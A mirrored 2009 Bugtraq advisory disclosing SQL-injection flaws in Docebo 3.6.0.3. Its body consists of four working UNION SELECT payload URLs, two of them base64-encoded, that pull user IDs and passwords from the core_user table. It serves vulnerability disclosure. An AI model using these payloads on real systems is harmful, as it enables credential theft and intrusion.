|
|
 |
| New User, Welcome! Login |
Docebo Multiple SQL-Injection Vulnerabilities
| From: |
Andrea Fabrizi <andrea fabrizi gmail com> |
| To: |
bugtraq securityfocus com |
| Cc: |
|
| Subject: |
Docebo Multiple SQL-Injection Vulnerabilities |
| Date: |
Fri - Oct 09, 2009 07:03 AM |
**************************************************************
Application: Docebo
Version affected: 3.6.0.3
Website: http://www.docebo.com
Discovered By: Andrea Fabrizi
Email: andrea.fabrizi@gmail.com
Web: http://www.andreafabrizi.it
Vuln: Multiple SQL-Injection Vulnerabilities
**************************************************************
########## EXAMPLE 1 ##########
roland@hp6720s:~$ echo -n "' union select userid,pass from core_user
-- " | base64
JyB1bmlvbiBzZWxlY3QgdXNlcmlkLHBhc3MgZnJvbSBjb3JlX3VzZXIgLS0g
-> http://localhost/docebo/doceboLms/index.php?modname=faq&op=play&mode=help&word=JyB1bmlvbiBzZWxlY3QgdXNlcmlkLHBhc3MgZnJvbSBjb3JlX3VzZXIgLS0g
###############################
########## EXAMPLE 2 ##########
roland@hp6720s:~$ echo -n "' union select 1,userid,pass from core_user
-- " | base64
JyB1bmlvbiBzZWxlY3QgMSx1c2VyaWQscGFzcyBmcm9tIGNvcmVfdXNlciAtLSA=
-> http://localhost/docebo/doceboLms/index.php?modname=link&op=play&mode=keyw&word=JyB1bmlvbiBzZWxlY3QgMSx1c2VyaWQscGFzcyBmcm9tIGNvcmVfdXNlciAtLSA=
###############################
########## EXAMPLE 3 ##########
-> http://localhost/docebo/doceboCore/index.php?modname=meta_certificate&op=elemmetacertificate&id_certificate=3222
union select concat (userid,0x3d,pass),2,3 from core_user limit 1,2
###############################
########## EXAMPLE 4 ##########
-> http://localhost/docebo/doceboCore/index.php?modname=certificate&op=elemcertificate&id_certificate=1123
union select concat(userid,0x3d,pass),2,3 from core_user limit 1,2
###############################
--
Andrea Fabrizi
http://www.andreafabrizi.it
|
|
|
Copyright © 1995-2012 LinuxRocket.net. All rights reserved.
Nearly all of LinuxRocket's features are free. Be kind and donate to the cause!
